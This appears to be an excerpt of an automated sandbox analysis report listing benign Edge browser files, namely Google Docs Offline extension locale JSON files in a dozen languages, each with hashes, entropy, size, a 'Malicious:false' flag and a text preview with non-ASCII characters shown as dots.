                                                                                                                                                                                                      SHA-256:D6E65238187A430FF29D4C10CF1C46B3F0FA4B91A5900A17C5DFD16E67FFC9BD
                                                                                                                                                                                                      SHA-512:E7D730304AED78C0F4A78DADBF835A22B3D8114FB41D67B2B26F4FE938B572763D3E127B7C1C81EBE7D538DA976A7A1E7ADC40F918F88AFADEA2201AE8AB47D0
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "CREA'N UN DE NOU".. },.. "explanationofflinedisabled": {.. "message": "No tens connexi.. Per utilitzar Documents de Google sense connexi. a Internet, ves a la configuraci. de la p.gina d'inici d'aquest servei i activa l'opci. per sincronitzar-se sense connexi. la propera vegada que estiguis connectat a la xarxa.".. },.. "explanationofflineenabled": {.. "message": "Tot i que no tens connexi., pots editar o crear fitxers.".. },.. "extdesc": {.. "message": "Edita, crea i consulta documents, fulls de c.lcul i presentacions, tot sense acc.s a Internet.".. },.. "extname": {.. "message": "Documents de Google sense connexi.".. },.. "learnmore": {.. "message": "M.s informaci.".. },.. "popuphelptext": {.. "message": "Escriu text, edita fitxers i col.labora-hi siguis on siguis, amb o sense connexi. a Internet.".. }..}..
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):913
                                                                                                                                                                                                      Entropy (8bit):4.947221919047
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:12:1HASvgdsbCBxNBmobXP15Dxoo60n40h6qCBxeBeGG/9jZCSUKFPDLZ2B2hCBhPLm:1HApJmoZ5e50nzQhwAd7dvYB2kDSGGKs
                                                                                                                                                                                                      MD5:CCB00C63E4814F7C46B06E4A142F2DE9
                                                                                                                                                                                                      SHA1:860936B2A500CE09498B07A457E0CCA6B69C5C23
                                                                                                                                                                                                      SHA-256:21AE66CE537095408D21670585AD12599B0F575FF2CB3EE34E3A48F8CC71CFAB
                                                                                                                                                                                                      SHA-512:35839DAC6C985A6CA11C1BFF5B8B5E59DB501FCB91298E2C41CB0816B6101BF322445B249EAEA0CEF38F76D73A4E198F2B6E25EEA8D8A94EA6007D386D4F1055
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "VYTVO.IT".. },.. "explanationofflinedisabled": {.. "message": "Jste offline. Pokud chcete Dokumenty Google pou..vat bez p.ipojen. k.internetu, a. budete p...t. online, p.ejd.te do nastaven. na domovsk. str.nce Dokument. Google a.zapn.te offline synchronizaci.".. },.. "explanationofflineenabled": {.. "message": "Jste offline, ale st.le m..ete upravovat dostupn. soubory nebo vytv..et nov..".. },.. "extdesc": {.. "message": "Upravujte, vytv..ejte a.zobrazujte sv. dokumenty, tabulky a.prezentace . v.e bez p..stupu k.internetu.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Dal.. informace".. },.. "popuphelptext": {.. "message": "Pi.te, upravujte a.spolupracujte kdekoli, s.p.ipojen.m k.internetu i.bez n.j.".. }..}..
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):806
                                                                                                                                                                                                      Entropy (8bit):4.815663786215102
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:12:YGo35xMxy6gLr4Dn1eBVa1xzxyn1VFQB6FDVgdAJex9QH7uy+XJEjENK32J21j:Y735+yoeeRG54uDmdXx9Q7u3r83Xj
                                                                                                                                                                                                      MD5:A86407C6F20818972B80B9384ACFBBED
                                                                                                                                                                                                      SHA1:D1531CD0701371E95D2A6BB5EDCB79B949D65E7C
                                                                                                                                                                                                      SHA-256:A482663292A913B02A9CDE4635C7C92270BF3C8726FD274475DC2C490019A7C9
                                                                                                                                                                                                      SHA-512:D9FBF675514A890E9656F83572208830C6D977E34D5744C298A012515BC7EB5A17726ADD0D9078501393BABD65387C4F4D3AC0CC0F7C60C72E09F336DCA88DE7
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:{"createnew":{"message":"CREU NEWYDD"},"explanationofflinedisabled":{"message":"Rydych chi all-lein. I ddefnyddio Dogfennau Google heb gysylltiad \u00e2'r rhyngrwyd, ewch i'r gosodiadau ar dudalen hafan Dogfennau Google a throi 'offine sync' ymlaen y tro nesaf y byddwch wedi'ch cysylltu \u00e2'r rhyngrwyd."},"explanationofflineenabled":{"message":"Rydych chi all-lein, ond gallwch barhau i olygu'r ffeiliau sydd ar gael neu greu rhai newydd."},"extdesc":{"message":"Gallwch olygu, creu a gweld eich dogfennau, taenlenni a chyflwyniadau \u2013 i gyd heb fynediad i'r rhyngrwyd."},"extname":{"message":"Dogfennau Google All-lein"},"learnmore":{"message":"DYSGU MWY"},"popuphelptext":{"message":"Ysgrifennwch, golygwch a chydweithiwch lle bynnag yr ydych, gyda chysylltiad \u00e2'r rhyngrwyd neu hebddo."}}.
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):883
                                                                                                                                                                                                      Entropy (8bit):4.5096240460083905
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:24:1HA4EFkQdUULMnf1yo+9qgpukAXW9bGJTvDyqdr:zEFkegfw9qwAXWNs/yu
                                                                                                                                                                                                      MD5:B922F7FD0E8CCAC31B411FC26542C5BA
                                                                                                                                                                                                      SHA1:2D25E153983E311E44A3A348B7D97AF9AAD21A30
                                                                                                                                                                                                      SHA-256:48847D57C75AF51A44CBF8F7EF1A4496C2007E58ED56D340724FDA1604FF9195
                                                                                                                                                                                                      SHA-512:AD0954DEEB17AF04858DD5EC3D3B3DA12DFF7A666AF4061DEB6FD492992D95DB3BAF751AB6A59BEC7AB22117103A93496E07632C2FC724623BB3ACF2CA6093F3
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "OPRET NYT".. },.. "explanationofflinedisabled": {.. "message": "Du er offline. Hvis du vil bruge Google Docs uden en internetforbindelse, kan du g. til indstillinger p. startsiden for Google Docs og aktivere offlinesynkronisering, n.ste gang du har internetforbindelse.".. },.. "explanationofflineenabled": {.. "message": "Du er offline, men du kan stadig redigere tilg.ngelige filer eller oprette nye.".. },.. "extdesc": {.. "message": "Rediger, opret og se dine dokumenter, regneark og pr.sentationer helt uden internetadgang.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "F. flere oplysninger".. },.. "popuphelptext": {.. "message": "Skriv, rediger og samarbejd, uanset hvor du er, og uanset om du har internetforbindelse.".. }..}..
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):1031
                                                                                                                                                                                                      Entropy (8bit):4.621865814402898
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:24:1HA6sZnqWd77ykJzCkhRhoe1HMNaAJPwG/p98HKpy2kX/R:WZqWxykJzthRhoQma+tpyHX2O/R
                                                                                                                                                                                                      MD5:D116453277CC860D196887CEC6432FFE
                                                                                                                                                                                                      SHA1:0AE00288FDE696795CC62FD36EABC507AB6F4EA4
                                                                                                                                                                                                      SHA-256:36AC525FA6E28F18572D71D75293970E0E1EAD68F358C20DA4FDC643EEA2C1C5
                                                                                                                                                                                                      SHA-512:C788C3202A27EC220E3232AE25E3C855F3FDB8F124848F46A3D89510C564641A2DFEA86D5014CEA20D3D2D3C1405C96DBEB7CCAD910D65C55A32FDCA8A33FDD4
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "NEU ERSTELLEN".. },.. "explanationofflinedisabled": {.. "message": "Sie sind offline. Um Google Docs ohne Internetverbindung zu verwenden, gehen Sie auf der Google Docs-Startseite auf \"Einstellungen\" und schalten die Offlinesynchronisierung ein, wenn Sie das n.chste Mal mit dem Internet verbunden sind.".. },.. "explanationofflineenabled": {.. "message": "Sie sind offline, aber k.nnen weiterhin verf.gbare Dateien bearbeiten oder neue Dateien erstellen.".. },.. "extdesc": {.. "message": "Mit der Erweiterung k.nnen Sie Dokumente, Tabellen und Pr.sentationen bearbeiten, erstellen und aufrufen.. ganz ohne Internetverbindung.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Weitere Informationen".. },.. "popuphelptext": {.. "message": "Mit oder ohne Internetverbindung: Sie k.nnen von .berall Dokumente erstellen, .ndern und zusammen mit anderen
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):1613
                                                                                                                                                                                                      Entropy (8bit):4.618182455684241
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:24:1HAJKan4EITDZGoziRAc2Z8eEfkTJfLhGX7b0UBNoAcGpVyhxefSmuq:SKzTD0IK85JlwsGOUyaSk
                                                                                                                                                                                                      MD5:9ABA4337C670C6349BA38FDDC27C2106
                                                                                                                                                                                                      SHA1:1FC33BE9AB4AD99216629BC89FBB30E7AA42B812
                                                                                                                                                                                                      SHA-256:37CA6AB271D6E7C9B00B846FDB969811C9CE7864A85B5714027050795EA24F00
                                                                                                                                                                                                      SHA-512:8564F93AD8485C06034A89421CE74A4E719BBAC865E33A7ED0B87BAA80B7F7E54B240266F2EDB595DF4E6816144428DB8BE18A4252CBDCC1E37B9ECC9F9D7897
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": ".......... ....".. },.. "explanationofflinedisabled": {.. "message": "..... ..... ......... ... .. ............... .. ....... Google ..... ....... ... ........., ......... .... ......... .... ...... ...... ... ........ Google ... ............. ... ........... ..... ........ ... ....... .... ... .. ..... ............ ... ..........".. },.. "explanationofflineenabled": {.. "message": "..... ..... ........ .... ........ .. .............. .. ......... ...... . .. ............. ... .......".. },.. "extdesc": {.. "message": ".............., ............ ... ..... .. ......., .
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):851
                                                                                                                                                                                                      Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                      MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                      SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                      SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                      SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):851
                                                                                                                                                                                                      Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                      MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                      SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                      SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                      SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):848
                                                                                                                                                                                                      Entropy (8bit):4.494568170878587
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:12:1HASvgg4eCBxNdN3vRyc1NzXW6iFrSCBxesJGceKCSUuvlvOgwCBhUufz1tnaXrQ:1HA3djfR3NzXviFrJj4sJXJ+bA6RM
                                                                                                                                                                                                      MD5:3734D498FB377CF5E4E2508B8131C0FA
                                                                                                                                                                                                      SHA1:AA23E39BFE526B5E3379DE04E00EACBA89C55ADE
                                                                                                                                                                                                      SHA-256:AB5CDA04013DCE0195E80AF714FBF3A67675283768FFD062CF3CF16EDB49F5D4
                                                                                                                                                                                                      SHA-512:56D9C792954214B0DE56558983F7EB7805AC330AF00E944E734340BE41C68E5DD03EDDB17A63BC2AB99BDD9BE1F2E2DA5BE8BA7C43D938A67151082A9041C7BA
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an Internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the Internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create and view your documents, spreadsheets and presentations . all without Internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn more".. },.. "popuphelptext": {.. "message": "Write, edit and collaborate wherever you are, with or without an Internet connection.".. }..}..
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):1425
                                                                                                                                                                                                      Entropy (8bit):4.461560329690825
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:24:1HA6Krbbds5Kna/BNzXviFrpsCxKU4irpNQ0+qWK5yOJAaCB7MAa6:BKrbBs5Kna/BNzXvi3sCxKZirA0jWK5m
                                                                                                                                                                                                      MD5:578215FBB8C12CB7E6CD73FBD16EC994
                                                                                                                                                                                                      SHA1:9471D71FA6D82CE1863B74E24237AD4FD9477187
                                                                                                                                                                                                      SHA-256:102B586B197EA7D6EDFEB874B97F95B05D229EA6A92780EA8544C4FF1E6BC5B1
                                                                                                                                                                                                      SHA-512:E698B1A6A6ED6963182F7D25AC12C6DE06C45D14499DDC91E81BDB35474E7EC9071CFEBD869B7D129CB2CD127BC1442C75E408E21EB8E5E6906A607A3982B212
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:{.. "createNew": {.. "description": "Text shown in the extension pop up for creating a new document",.. "message": "CREATE NEW".. },.. "explanationOfflineDisabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is disabled.",.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationOfflineEnabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is enabled.",.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extDesc": {.. "description": "Extension description",.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extName": {.. "description": "Extension name",..
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):961
                                                                                                                                                                                                      Entropy (8bit):4.537633413451255
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:12:1HASvggeCBxNFxcw2CVcfamedatqWCCBxeFxCF/m+rWAaFQbCSUuExqIQdO06stp:1HAqn0gcfa9dc/5mCpmIWck02USfWmk
                                                                                                                                                                                                      MD5:F61916A206AC0E971CDCB63B29E580E3
                                                                                                                                                                                                      SHA1:994B8C985DC1E161655D6E553146FB84D0030619
                                                                                                                                                                                                      SHA-256:2008F4FAAB71AB8C76A5D8811AD40102C380B6B929CE0BCE9C378A7CADFC05EB
                                                                                                                                                                                                      SHA-512:D9C63B2F99015355ACA04D74A27FD6B81170750C4B4BE7293390DC81EF4CD920EE9184B05C61DC8979B6C2783528949A4AE7180DBF460A2620DBB0D3FD7A05CF
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "CREAR".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a Configuraci.n en la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que te conectes a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n. Aun as., puedes crear archivos o editar los que est.n disponibles.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones; todo ello, sin acceso a Internet.".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe o edita contenido y colabora con otras personas desde cualquier lugar, con o sin conexi.n a Internet.".. }..}..
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):959
                                                                                                                                                                                                      Entropy (8bit):4.570019855018913
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:24:1HARn05cfa9dcDmQOTtSprj0zaGUSjSGZ:+n0CfMcDmQOTQprj4qpC
                                                                                                                                                                                                      MD5:535331F8FB98894877811B14994FEA9D
                                                                                                                                                                                                      SHA1:42475E6AFB6A8AE41E2FC2B9949189EF9BBE09FB
                                                                                                                                                                                                      SHA-256:90A560FF82605DB7EDA26C90331650FF9E42C0B596CEDB79B23598DEC1B4988F
                                                                                                                                                                                                      SHA-512:2CE9C69E901AB5F766E6CFC1E592E1AF5A07AA78D154CCBB7898519A12E6B42A21C5052A86783ABE3E7A05043D4BD41B28960FEDDB30169FF7F7FE7208C8CFE9
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "CREAR NUEVO".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a la configuraci.n de la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que est.s conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n, pero a.n puedes modificar los archivos disponibles o crear otros nuevos.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones aunque no tengas acceso a Internet".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, modifica y colabora dondequiera que est.s, con conexi.n a Internet o sin ella.".. }..}..
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):968
                                                                                                                                                                                                      Entropy (8bit):4.633956349931516
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:24:1HA5WG6t306+9sihHvMfdJLjUk4NJPNczGr:mWGY0cOUdJODPmzs
                                                                                                                                                                                                      MD5:64204786E7A7C1ED9C241F1C59B81007
                                                                                                                                                                                                      SHA1:586528E87CD670249A44FB9C54B1796E40CDB794
                                                                                                                                                                                                      SHA-256:CC31B877238DA6C1D51D9A6155FDE565727A1956572F466C387B7E41C4923A29
                                                                                                                                                                                                      SHA-512:44FCF93F3FB10A3DB68D74F9453995995AB2D16863EC89779DB451A4D90F19743B8F51095EEC3ECEF5BD0C5C60D1BF3DFB0D64DF288DCCFBE70C129AE350B2C6
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "LOO UUS".. },.. "explanationofflinedisabled": {.. "message": "Teil ei ole v.rgu.hendust. Teenuse Google.i dokumendid kasutamiseks ilma Interneti-.henduseta avage j.rgmine kord, kui olete Internetiga .hendatud, teenuse Google.i dokumendid avalehel seaded ja l.litage sisse v.rgu.henduseta s.nkroonimine.".. },.. "explanationofflineenabled": {.. "message": "Teil ei ole v.rgu.hendust, kuid saate endiselt saadaolevaid faile muuta v.i uusi luua.".. },.. "extdesc": {.. "message": "Saate luua, muuta ja vaadata oma dokumente, arvustustabeleid ning esitlusi ilma Interneti-.henduseta.".. },.. "extname": {.. "message": "V.rgu.henduseta Google.i dokumendid".. },.. "learnmore": {.. "message": "Lisateave".. },.. "popuphelptext": {.. "message": "Kirjutage, muutke ja tehke koost..d .ksk.ik kus olenemata sellest, kas teil on Interneti-.hendus.".. }..}..
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):838
                                                                                                                                                                                                      Entropy (8bit):4.4975520913636595
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:24:YnmjggqTWngosqYQqE1kjO39m7OddC0vjWQMmWgqwgQ8KLcxOb:Ynmsgqyngosq9qxTOs0vjWQMbgqchb
                                                                                                                                                                                                      MD5:29A1DA4ACB4C9D04F080BB101E204E93
                                                                                                                                                                                                      SHA1:2D0E4587DDD4BAC1C90E79A88AF3BD2C140B53B1
                                                                                                                                                                                                      SHA-256:A41670D52423BA69C7A65E7E153E7B9994E8DD0370C584BDA0714BD61C49C578
                                                                                                                                                                                                      SHA-512:B7B7A5A0AA8F6724B0FA15D65F25286D9C66873F03080CBABA037BDEEA6AADC678AC4F083BC52C2DB01BEB1B41A755ED67BBDDB9C0FE4E35A004537A3F7FC458
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:{"createnew":{"message":"SORTU"},"explanationofflinedisabled":{"message":"Ez zaude konektatuta Internetera. Google Dokumentuak konexiorik gabe erabiltzeko, joan Google Dokumentuak zerbitzuaren orri nagusiko ezarpenetara eta aktibatu konexiorik gabeko sinkronizazioa Internetera konektatzen zaren hurrengoan."},"explanationofflineenabled":{"message":"Ez zaude konektatuta Internetera, baina erabilgarri dauden fitxategiak edita ditzakezu, baita beste batzuk sortu ere."},"extdesc":{"message":"Editatu, sortu eta ikusi dokumentuak, kalkulu-orriak eta aurkezpenak Interneteko konexiorik gabe."},"extname":{"message":"Google Dokumentuak konexiorik gabe"},"learnmore":{"message":"Lortu informazio gehiago"},"popuphelptext":{"message":"Edonon zaudela ere, ez duzu zertan konektatuta egon idatzi, editatu eta lankidetzan jardun ahal izateko."}}.
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):1305
                                                                                                                                                                                                      Entropy (8bit):4.673517697192589
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:24:1HAX9yM7oiI99Rwx4xyQakJbfAEJhmq/RlBu92P7FbNcgYVJ0:JM7ovex4xyQaKjAEyq/p7taX0
                                                                                                                                                                                                      MD5:097F3BA8DE41A0AAF436C783DCFE7EF3
                                                                                                                                                                                                      SHA1:986B8CABD794E08C7AD41F0F35C93E4824AC84DF
                                                                                                                                                                                                      SHA-256:7C4C09D19AC4DA30CC0F7F521825F44C4DFBC19482A127FBFB2B74B3468F48F1
                                                                                                                                                                                                      SHA-512:8114EA7422E3B20AE3F08A3A64A6FFE1517A7579A3243919B8F789EB52C68D6F5A591F7B4D16CEE4BD337FF4DAF4057D81695732E5F7D9E761D04F859359FADB
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "..... ... ....".. },.. "explanationofflinedisabled": {.. "message": "...... ...... .... ....... .. ....... Google .... ..... ........ .... ... .. .. ....... ... ..... .. ....... .. .... .... ....... Google ..... . .......... ...... .. .... .....".. },.. "explanationofflineenabled": {.. "message": "...... ..... ... ...... ......... ......... .. .. .. ..... ..... ...... .... .. ........ ..... ..... .....".. },.. "extdesc": {.. "message": "...... ............ . ........ .. ....... ..... . ...... .... . ... ... ..... .... ...... .. ........".. },.. "extname": {.. "message": "....... Google .
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):911
                                                                                                                                                                                                      Entropy (8bit):4.6294343834070935
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:12:1HASvguCBxNMME2BESA7gPQk36xCBxeMMcXYBt+CSU1pfazCBhUunV1tLaX5GI2N:1HAVioESAsPf36O3Xst/p3J8JeEY
                                                                                                                                                                                                      MD5:B38CBD6C2C5BFAA6EE252D573A0B12A1
                                                                                                                                                                                                      SHA1:2E490D5A4942D2455C3E751F96BD9960F93C4B60
                                                                                                                                                                                                      SHA-256:2D752A5DBE80E34EA9A18C958B4C754F3BC10D63279484E4DF5880B8FD1894D2
                                                                                                                                                                                                      SHA-512:6E65207F4D8212736059CC802C6A7104E71A9CC0935E07BD13D17EC46EA26D10BC87AD923CD84D78781E4F93231A11CB9ED8D3558877B6B0D52C07CB005F1C0C
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "LUO UUSI".. },.. "explanationofflinedisabled": {.. "message": "Olet offline-tilassa. Jos haluat k.ytt.. Google Docsia ilman internetyhteytt., siirry Google Docsin etusivulle ja ota asetuksissa k.ytt..n offline-synkronointi, kun seuraavan kerran olet yhteydess. internetiin.".. },.. "explanationofflineenabled": {.. "message": "Olet offline-tilassa. Voit kuitenkin muokata k.ytett.viss. olevia tiedostoja tai luoda uusia.".. },.. "extdesc": {.. "message": "Muokkaa, luo ja katso dokumentteja, laskentataulukoita ja esityksi. ilman internetyhteytt..".. },.. "extname": {.. "message": "Google Docsin offline-tila".. },.. "learnmore": {.. "message": "Lis.tietoja".. },.. "popuphelptext": {.. "message": "Kirjoita, muokkaa ja tee yhteisty.t. paikasta riippumatta, my.s ilman internetyhteytt..".. }..}..
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):939
                                                                                                                                                                                                      Entropy (8bit):4.451724169062555
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:24:1HAXbH2eZXn6sjLITdRSJpGL/gWFJ3sqixO:ubHfZqsHIT/FLL3qO
                                                                                                                                                                                                      MD5:FCEA43D62605860FFF41BE26BAD80169
                                                                                                                                                                                                      SHA1:F25C2CE893D65666CC46EA267E3D1AA080A25F5B
                                                                                                                                                                                                      SHA-256:F51EEB7AAF5F2103C1043D520E5A4DE0FA75E4DC375E23A2C2C4AFD4D9293A72
                                                                                                                                                                                                      SHA-512:F66F113A26E5BCF54B9AAFA69DAE3C02C9C59BD5B9A05F829C92AF208C06DC8CCC7A1875CBB7B7CE425899E4BA27BFE8CE2CDAF43A00A1B9F95149E855989EE0
                                                                                                                                                                                                      Malicious:false
